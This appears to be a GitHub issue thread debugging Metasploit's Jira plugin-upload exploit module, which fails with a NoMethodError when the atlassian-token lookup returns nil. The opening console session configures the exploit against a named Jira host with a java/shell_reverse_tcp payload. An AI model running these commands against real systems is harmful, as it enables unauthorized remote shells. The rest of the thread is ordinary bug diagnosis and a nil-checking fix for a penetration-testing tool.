msf5 > use exploit/multi/http/jira_plugin_upload
msf5 exploit(multi/http/jira_plugin_upload) > set HttpPassword <password>
msf5 exploit(multi/http/jira_plugin_upload) > set HttpUsername <username>
msf5 exploit(multi/http/jira_plugin_upload) > set RHOSTS jira-stage.company.com
msf5 exploit(multi/http/jira_plugin_upload) > set SSL true
msf5 exploit(multi/http/jira_plugin_upload) > set payload java/shell_reverse_tcp
msf5 exploit(multi/http/jira_plugin_upload) > set LHOST <lhostIP>
msf5 exploit(multi/http/jira_plugin_upload) > run
[*] Started bind TCP handler against <IP>:4444
[*] Sending stage (2952 bytes) to <IP>
or
[*] Exploit completed, but no session was created.
What happens instead?
msf5 exploit(multi/http/jira_plugin_upload) > run
[*] Started reverse TCP handler on 10.150.29.100:4444
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
metasploit v5.0.12-dev,
installed via apt on the Kali subsystem on Windows 10
(Kali Linux from the Windows 10 Store, running as a subsystem)
Do you get additional output with set verbose true?
Yes:
msf5 exploit(multi/http/jira_plugin_upload) > set verbose true
verbose => true
msf5 exploit(multi/http/jira_plugin_upload) > run
[*] Started HTTP reverse handler on http://<IP>:4444
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.
Welp. I guess it's failing somewhere in access_login?, as execution never proceeds as far as print_status('Retrieving Session ID and XSRF token...')
def access_login?
  res = query_login
  if res.nil?
    fail_with(Failure::Unknown, 'Unable to access the web application!')
  end
  return false unless res && res.code == 200
  @session_id = get_sid(res)
  # at() returns nil when the page has no <meta id="atlassian-token">,
  # and nil['content'] is the NoMethodError seen above
  @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
  return true
end
# ...
def exploit
  unless access_login?
    fail_with(Failure::Unknown, 'Unable to access the web application!')
  end
  print_status('Retrieving Session ID and XSRF token...')
  # ...
@dubfr33 @space-r7
Got a hint!
When RPORT isn't set to a valid value, the error occurs; when it is valid, no error shows up:
msf5 exploit(multi/http/jira_plugin_upload) > run
[*] Started HTTP reverse handler on http://<IP>:4444
[*] Retrieving Session ID and XSRF token...
[*] Attempting to upload JRrKInwRj
[*] Error uploading JRrKInwRj
[*] HTTP Response Code: 401
[*] Server Response: {"subCode":"upm.websudo.error"}
[*] Exploit completed, but no session was created.
@xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content'] might be causing the issue. res.get_html_document.at('meta[@id="atlassian-token"]') can return nil.
$ irb
2.6.1 :001 > require 'nokogiri'
=> true
2.6.1 :002 > a = Nokogiri::HTML('<html><head><title>blah</title></head></html>')
=> #<Nokogiri::HTML::Document:0x2ac618f00c40 name="document" children=[#<Nokogiri::XML::DTD:0x2ac618f009d4 name="html">, #<Nokogiri::XML::Element:0x2ac618f00718 name="html" children=[#<Nokogiri::XML::Element:0x2ac618ef3fa4 name="head" children=[#<Nokogiri::XML::Element:0x2ac618ef3bf8 name="title" children=[#<Nokogiri::XML::Text:0x2ac618ef38ec "blah">]>]>]>]>
2.6.1 :003 > a.at('meta[@id="atlassian-token"]')['content']
Traceback (most recent call last):
4: from /home/msfdev/.rvm/rubies/ruby-2.6.1/bin/irb:23:in `<main>'
3: from /home/msfdev/.rvm/rubies/ruby-2.6.1/bin/irb:23:in `load'
2: from /home/msfdev/.rvm/rubies/ruby-2.6.1/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
1: from (irb):3
NoMethodError (undefined method `[]' for nil:NilClass)
2.6.1 :004 > a.at('meta[@id="atlassian-token"]')
=> nil
2.6.1 :005 >
Can someone PR a fix? I nominate @rdek.
And tsk tsk, this is why we should always check the return value of XPath queries!
The check method will also need to be amended:
# grep get_html_document modules/exploits/multi/http/jira_plugin_upload.rb
@xsrf_token = login_res.get_html_document.at('meta[@id="atlassian-token"]')['content']
@xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
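The pattern the thread is asking for, as an added example that is not the module's code and not part of any comment above: extract the atlassian-token meta tag with an explicit nil check at each step, and turn the access_login? flow into a function that reports why it failed (wrong port landing on a non-Jira page, non-200 status, token element present but empty) instead of raising NoMethodError on nil. It uses REXML from the Ruby standard distribution rather than Nokogiri so it runs without gems; with Nokogiri the equivalent query is doc.at('meta[@id="atlassian-token"]') and the nil check is the same. The sample pages and the token value are constructed, not captured from a real Jira instance.

```ruby
require 'rexml/document'

# Returns the XSRF token string, or nil when the page has no usable
# <meta id="atlassian-token" content="..."> element. Every call that can
# yield nil is checked before it is dereferenced.
def extract_xsrf_token(html)
  doc = REXML::Document.new(html)
  meta = doc.elements["//meta[@id='atlassian-token']"]
  return nil if meta.nil?                         # element missing: not a Jira login page
  token = meta.attributes['content']
  return nil if token.nil? || token.strip.empty?  # element present but carries no token
  token
rescue REXML::ParseException
  nil                                             # not even well-formed markup
end

# Result of probing the login page: ok?, the token, and a human-readable reason on failure.
LoginProbe = Struct.new(:ok, :token, :reason)

# Hardened equivalent of the module's access_login? flow, written as a plain
# function over (status, body) so it can be exercised offline. Names and
# structure are this example's own assumptions, not the module's API.
def probe_login(status, body)
  return LoginProbe.new(false, nil, 'no response from target') if body.nil?
  return LoginProbe.new(false, nil, "unexpected HTTP status #{status}") unless status == 200
  token = extract_xsrf_token(body)
  if token.nil?
    return LoginProbe.new(false, nil,
      'atlassian-token meta tag not found; is RPORT pointing at a Jira login page?')
  end
  LoginProbe.new(true, token, nil)
end

# Constructed sample responses (not from a real Jira instance).
JIRA_LOGIN_PAGE = <<~HTML
  <html><head><title>Log in - Jira</title>
  <meta id="atlassian-token" name="atlassian-token" content="BPGS-EXAMPLE-TOKEN-0000"/>
  </head><body></body></html>
HTML

# What a wrong RPORT typically returns: some other service's page, no atlassian-token.
OTHER_SERVICE_PAGE = '<html><head><title>blah</title></head><body></body></html>'

# Element present but without a content attribute.
EMPTY_TOKEN_PAGE = '<html><head><meta id="atlassian-token" name="atlassian-token"/></head><body></body></html>'

if $PROGRAM_NAME == __FILE__
  [[200, JIRA_LOGIN_PAGE], [200, OTHER_SERVICE_PAGE], [200, EMPTY_TOKEN_PAGE],
   [302, OTHER_SERVICE_PAGE], [200, nil]].each do |status, body|
    r = probe_login(status, body)
    puts r.ok ? "ok: token=#{r.token}" : "failed: #{r.reason}"
  end
end
```

Run it directly to see each failure mode reported as a message rather than a backtrace; in a Metasploit module the nil branches would map to fail_with calls so the user sees a reason instead of "NoMethodError undefined method `[]' for nil:NilClass".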
I, too, nominate @rdek
Not sure how I didn't notice this when I was tagged, but I can PR a fix for this.
Fixed in #11784